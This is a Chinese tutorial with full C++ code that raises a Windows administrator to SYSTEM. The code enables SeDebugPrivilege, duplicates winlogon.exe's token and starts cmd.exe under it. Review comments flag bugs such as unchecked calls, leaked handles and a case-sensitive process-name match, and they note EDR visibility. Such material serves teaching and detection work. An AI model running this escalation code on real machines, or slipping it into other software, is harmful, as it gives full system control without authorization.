通过复制Token提权到SYSTEM
Windows系统使用粒度较细的Token来区分和管理权限。我们通常所说的system权限和administrator权限,本质上是令牌的完整性级别和特权不同,通过粒度较细的特权加以区分。
本文不会对令牌机制进行详细剖析,只需知道它本质上是一个内核对象即可;具体内容会在以后的内核操作文章中讲解。
    下图分别是medium完整性令牌和high完整性令牌。

提权流程

    1. 打开system权限进程
    2. 复制system权限进程Token
    3. 使用复制Token打开新进程

代码实现

默认配置下的管理员拥有SeDebugPrivilege,该特权用于调试进程;是否拥有它直接决定了你能否打开、写入、调试或注入winlogon、system等进程。
#include <windows.h>
#include <iostream>
#include <Lmcons.h>
#include <TlHelp32.h>
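/**
 * Enable or disable one named privilege on an access token.
 *
 * @param hToken           Token opened with TOKEN_ADJUST_PRIVILEGES.
 * @param lpszPrivilege    Privilege name, e.g. L"SeDebugPrivilege".
 * @param bEnablePrivilege TRUE sets SE_PRIVILEGE_ENABLED, FALSE clears it.
 * @return TRUE only when the privilege was actually adjusted. Returns FALSE if
 *         the name cannot be resolved, if AdjustTokenPrivileges fails, or if
 *         the token does not hold the privilege at all
 *         (AdjustTokenPrivileges then returns non-zero but sets
 *         ERROR_NOT_ALL_ASSIGNED, which previously was reported as success).
 */
BOOL SePrivTokenrivilege(
    HANDLE hToken,
    LPCTSTR lpszPrivilege,
    BOOL bEnablePrivilege
)
{
    LUID luid = { 0 };

    // Resolve the privilege name to its locally unique identifier.
    if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
    {
        return FALSE;
    }

    TOKEN_PRIVILEGES PrivToken = { 0 };
    PrivToken.PrivilegeCount = 1;
    PrivToken.Privileges[0].Luid = luid;
    PrivToken.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0;

    // No previous-state buffer is requested, hence the two NULL arguments.
    if (!AdjustTokenPrivileges(hToken, FALSE, &PrivToken, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
    {
        return FALSE;
    }

    // AdjustTokenPrivileges succeeds even when the privilege is not present on
    // the token; that partial result is signalled through the last error.
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
    {
        return FALSE;
    }

    return TRUE;
}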
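/**
 * Return the PID of the first running process whose image name equals
 * ProcessName (exact, case-sensitive wide-string comparison via wcscmp).
 *
 * @param ProcessName Image file name to look for, e.g. L"winlogon.exe".
 * @return The matching process id, or 0 when the snapshot cannot be taken or
 *         no entry matches. (Without the explicit 0, a miss would hand back
 *         the th32ProcessID of whatever entry was enumerated last.)
 */
DWORD FindProcessPID(const wchar_t* ProcessName) {
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    // CreateToolhelp32Snapshot reports failure with INVALID_HANDLE_VALUE, not NULL.
    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }

    DWORD pid = 0;
    PROCESSENTRY32 process = { 0 };
    process.dwSize = sizeof(process);

    if (Process32First(snapshot, &process)) {
        do {
            // NOTE(review): the cast of szExeFile to wchar_t* is only valid in
            // a UNICODE build (PROCESSENTRY32W) — confirm the project settings.
            if (!wcscmp((const wchar_t*)process.szExeFile, ProcessName)) {
                pid = process.th32ProcessID;
                break;
            }
        } while (Process32Next(snapshot, &process));
    }

    CloseHandle(snapshot);
    return pid;
}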
// Entry point. As written the sequence is: enable SeDebugPrivilege on this
// process' own token, look up winlogon.exe, open it, open and duplicate its
// token as a primary token, then start cmd.exe under the copy.
// Every Win32 return value below (getCurrentToken, TokenRet, impersonateUser,
// dpToken, Ret) is stored but never checked, so a failure at any step feeds a
// NULL handle into the next call instead of stopping.
// NOTE(review): each step — privilege adjustment, the OpenProcess on
// winlogon.exe, DuplicateTokenEx and CreateProcessWithTokenW — is a distinct
// observable event; which of them a given audit/EDR configuration surfaces
// should be confirmed against that sensor rather than assumed.
int main(int argc, char** argv) {
    HANDLE hDpToken = NULL;

    // Step 1: enable SeDebugPrivilege on our own token (the text above
    // explains why it is needed to open a process such as winlogon.exe).
    HANDLE hCurrentToken = NULL;
    BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hCurrentToken);
    // NOTE(review): the adjustment's result is discarded.
    SePrivTokenrivilege(hCurrentToken, L"SeDebugPrivilege", TRUE);

    // Step 2: locate the target. FindProcessPID compares image names with
    // wcscmp, i.e. an exact, case-sensitive match against this spelling.
    DWORD PID_TO_IMPERSONATE = FindProcessPID(L"Winlogon.exe");
    // bInheritHandle is true here, so the handle is inheritable.
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, true, PID_TO_IMPERSONATE);

    // Step 3: open the target's token with the rights needed to duplicate it
    // into a new primary token.
    HANDLE hToken = NULL;
    BOOL TokenRet = OpenProcessToken(hProcess,
        TOKEN_DUPLICATE |
        TOKEN_ASSIGN_PRIMARY |
        TOKEN_QUERY, &hToken);

    // Impersonate, then revert. NOTE(review): the condition compares the last
    // error code with NULL (a pointer constant, i.e. 0) and never looks at
    // impersonateUser; if any earlier call left a non-zero error code,
    // RevertToSelf() is skipped and the thread keeps the impersonation token.
    BOOL impersonateUser = ImpersonateLoggedOnUser(hToken);
    if (GetLastError() == NULL)
    {
        RevertToSelf();
    }

    // Step 4: duplicate the token as a primary token (TokenPrimary) at
    // SecurityImpersonation level with a default security descriptor (NULL).
    BOOL dpToken = DuplicateTokenEx(hToken,
        TOKEN_ADJUST_DEFAULT |
        TOKEN_ADJUST_SESSIONID |
        TOKEN_QUERY |
        TOKEN_DUPLICATE |
        TOKEN_ASSIGN_PRIMARY,
        NULL,
        SecurityImpersonation,
        TokenPrimary,
        &hDpToken
    );

    // Step 5: start cmd.exe under the duplicated token.
    STARTUPINFO startupInfo = {0};
    startupInfo.cb = sizeof(STARTUPINFO);
    PROCESS_INFORMATION ProcessInfo = {0};

    BOOL Ret = CreateProcessWithTokenW(hDpToken,
        LOGON_WITH_PROFILE,
        L"C:\\Windows\\System32\\cmd.exe",
        NULL, 0, NULL, NULL,
        &startupInfo,
        &ProcessInfo);

    // NOTE(review): hCurrentToken, hProcess, hToken, hDpToken and the two
    // ProcessInfo handles are never closed, and TRUE (1) is returned as the
    // process exit status, which conventionally signals failure.
    return TRUE;
}

LINKS

Microsoft 标识平台访问令牌 - Microsoft identity platform